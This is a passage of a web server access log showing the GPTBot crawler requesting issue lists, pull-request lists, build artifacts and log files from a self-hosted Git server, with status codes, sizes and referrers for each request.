74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9819] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11116] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:18:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=all&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 11210] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:18:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:18:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:18:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:18:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:18:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14507] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:18:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 13352] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=rendered" [Client 74.7.227.38] [Length 11265] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fREADME_WINDOWS.md" [Client 74.7.227.38] [Length 36168] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35759] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 12079] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 